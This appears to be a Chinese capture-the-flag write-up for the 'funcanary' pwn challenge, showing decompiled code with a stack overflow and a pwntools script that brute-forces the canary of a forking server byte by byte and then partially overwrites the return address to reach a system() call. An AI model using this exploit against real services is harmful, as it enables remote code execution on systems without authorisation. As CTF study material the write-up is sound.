ciscn_funcanary
保护检查
源码分析
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
__pid_t v3; // [rsp+Ch] [rbp-4h]
sub_1243(a1, a2, a3);
while ( 1 )
{
v3 = fork();
if ( v3 < 0 )
break;
if ( v3 )
{
wait(0LL);
}
else
{
puts("welcome");
sub_128A();
puts("have fun");
}
}
puts("fork error");
exit(0);
}
|
1
2
3
4
5
6
7
8
9
| unsigned __int64 sub_128A()
{
char buf[104]; // [rsp+0h] [rbp-70h] BYREF
unsigned __int64 v2; // [rsp+68h] [rbp-8h]
v2 = __readfsqword(0x28u);
read(0, buf, 0x80uLL);
return v2 - __readfsqword(0x28u);
}
|
存在溢出但是有canary,fork出的进程内存一样,可以进行爆破,最后直接转移到偏移为0x1231的地址处
就是劫持到如下代码处
最开始我用的是1229那个地址,但是一直出错,不清楚是哪里除了问题。(但我猜测应该是前面的压栈操作使程序调用system函数时栈不是对齐的)
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#p = process("./funcanary")
p = remote('39.105.26.155',28813)
flagoffset = 0x1229
canary = '\x00'
p.recvuntil("welcome\n")
for j in range(7):
for i in range(0x100):
payload = 'a'*104 + canary + chr(i)
p.send(payload)
a = p.recvuntil("welcome\n")
if 'fun' in a:
canary += chr(i)
break
for i in range(16):
payload = 'a'*104 + canary + 'a'*8 + '\x31'
payload += chr(i*16 + 2)
p.send(payload)
p.recv()
#while True:
# payload = 'a'*104 + canary + 'a'*8 + '\x29' + '\x12'
# p.send(payload)
# p.recvuntil("welcome\n")
p.interactive()
|
